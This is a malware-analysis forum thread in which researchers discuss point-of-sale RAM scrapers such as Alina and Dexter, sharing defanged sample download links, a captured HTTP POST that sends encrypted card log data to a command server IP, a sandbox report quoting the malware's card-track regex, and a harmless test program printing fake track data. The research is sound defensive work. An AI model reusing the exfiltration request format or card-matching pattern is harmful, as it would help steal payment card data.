Point-of-Sale malwares / RAM scrapers

Forum for analysis and discussion about malware.
Post Reply
bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Sun Feb 03, 2013 12:02 pm

Awsome xylitol, you've just ruined my sunday :)
Now I have work to do.

Just took a look at the second sample (v2.1) from your previous post. He sent to my fake PHP panel this:

Code: Select all

DATA: a:5:{s:3:"act";s:1:"l";s:1:"b";s:8:"982f17d9";s:1:"c";s:15:"XTMTRX-8D35CB4";s:1:"v";s:4:"v2.1";s:5:"ldata";s:326:"f0c2c5d8dfcac7c7c8c3cec8c091999bf68befcec7cedfc2c5cc8bc4c7cf8bcdc2c7ce8bcac7c2c5ca96e891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfc4d9f7efced8c0dfc4dbf7c9c4dff4cecf85ced3cea1f0d8dfcad9dff4dedbcfcadfcef4dfc3d9cecacf91999b9df68bdedbcfcadfce8bdfc3d9cecacf8bc7cadec5c8c3cecf8bd8dec8c8ced8d8cddec7c7d2a1";}
Now figuring out what's the encryption on the POST variable "ldata" (log data).

User avatar
Xylitol
Global Moderator
Posts: 1670
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Point-of-Sale malwares / RAM scrapers

Post by Xylitol » Sun Feb 03, 2013 12:26 pm

Alina 3.4 Sample in attach
In the wild: hxtp://pierremoreau.ca/backup2011/3_4.exe
https://www.virustotal.com/file/036e4f4 ... 359894166/ > 28/46

Code: Select all

POST /forum/login.php HTTP/1.1
Accept: text/*, application/octet-stream
Content-Type: application/x-www-form-urlencoded
User-Agent: Alina v3.4
Host: 208.98.63.228
Content-Length: 642
Cache-Control: no-cache

act=l&b=8a43ad2&c=XYL2K-E87171510&v=v3.4&p=C:\3_4.exe&ldata=f0c2c5d8dfcac7c7c8c3cec8c0919a9a9c8b979b95f68befcec7cedfcecf8be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7dcc2c586cdc2d9cedccac7c785ced3ce8bcdd9c4c68bc4c7cf8bd8cedfdedb858bcfcec7cedfc2c5cc8bcadedfc4d8dfcad9df85a1f0c2c5d8dfcac7c7c8c3cec8c0919a9c928b979b95f68be2c5d8dfcac7c7cecf8bdfc48be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfceded9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7c1ded8c8c3cecf85ced3ce878bd8dfcad9dfcecf8bc5cedc8bdbd9c4c8ced8d88bdcc2dfc38bcac7c2c5ca96e891f798f49f85ced3cea1HTTP/1.1 666 OK
Server: nginx/1.0.15
Date: Sun, 03 Feb 2013 12:33:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.7

8
li:2:120
0
You do not have the required permissions to view the files attached to this post.

User avatar
aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by aaSSfxxx » Sun Feb 03, 2013 5:32 pm

Btw got new stuff on hXXp://royjamesinsurance.com/images/ .

This time, no sql server creds in command strings :( (malware attached).
Same shit than the sample i posted before.
https://www.virustotal.com/file/6d4d91f ... 359968332/ > 10/46
You do not have the required permissions to view the files attached to this post.
Last edited by Xylitol on Mon Feb 04, 2013 9:00 am, edited 1 time in total.
Reason: Link obfuscation

bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Sun Feb 03, 2013 6:24 pm

Sends data to some panel now or...?

User avatar
aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by aaSSfxxx » Sun Feb 03, 2013 8:36 pm

No, it seems to store data into a local sql server database (new sample seems to have the same structure than the other ones)

User avatar
Xylitol
Global Moderator
Posts: 1670
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Point-of-Sale malwares / RAM scrapers

Post by Xylitol » Tue Feb 05, 2013 1:35 pm

You do not have the required permissions to view the files attached to this post.

User avatar
Buster_BSA
Posts: 390
Joined: Mon Mar 22, 2010 6:42 am

Re: Point-of-Sale malwares / RAM scrapers

Post by Buster_BSA » Tue Feb 05, 2013 4:38 pm

Xylitol wrote:fresh Troj/Trackr-Gen
https://www.virustotal.com/file/f72a63c ... 360071120/ > 19/46

Code: Select all


 Report generated with Buster Sandbox Analyzer 1.87 at 17:36:13 on 05/02/2013

 [ General information ]
   * Analysis duration: 00:00:30
   * File name: c:\m\test\f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8.exe
   * File length: 128000 bytes
   * File signature (PEiD): Borland Delphi 6.0 - 7.0
   * File signature (Exeinfo): Borland Delphi ( 2.0 - 7.0 ) 1992 - www.borland.com
   * File type: EXE
   * TLS hooks: NO
   * File entropy: 6.50491 (81.3113%)
   * ssdeep signature: 3072:giYkr6DJ2ZUSlcCwDesr/QOOGXbn4DQFu/U3buRKlemZ9DnGAeJo5CQh6BrUO3ss:Bv+KFiDXL4DQFu/U3buRKlemZ9DnGAeK
   * Adobe Malware Classifier: Malicious
   * Digital signature: Unsigned
   * MD5 hash: aef00dcd16d6aad056a345ac320a8d99
   * SHA1 hash: 48db3a315d9e8bc0bce2c99cfde3bb9224af3dce
   * SHA256 hash: f72a63c004508855a526779798c2d8ae035c87d2f43467cd9e1b0467dad67fa8

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * No changes

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Enumerates running processes.
   * Contains string Point-of-sale information stealer ("((b|B)[0-9]{13,19}\^[A-Za-z\s]{0,30}\/[A-Za-z\s]{0,30}\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\s]{3,50}[0-9]{1})")
   * Sleeps 30 seconds.

gritland
Posts: 31
Joined: Tue May 11, 2010 10:57 am

Re: Point-of-Sale malwares / RAM scrapers

Post by gritland » Wed Feb 06, 2013 3:15 pm

someone has a unpacked version of Dexter?

bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Wed Feb 06, 2013 3:36 pm

gritland wrote:someone has a unpacked version of Dexter?
Interested too. I unpacked one with Volatility but seems I've broken it somewhere, it runs but gives error.

bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Re: Point-of-Sale malwares / RAM scrapers

Post by bsteo » Wed Feb 06, 2013 4:32 pm

Little harmless code I made to trigger any POS malware to grab and send data to C&C . Attached compiled with VS10. Code as follows:

Code: Select all

#include <iostream>
#include <conio.h>
#include <windows.h>

using namespace std;

char track1[100] = "%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?";
char track2[100] = "4744870016311111=14091010000000000072";

int main(){
	cout << track1 << endl;
	cout << track2 << endl;
	getch();
	return 0;
}
You do not have the required permissions to view the files attached to this post.

Post Reply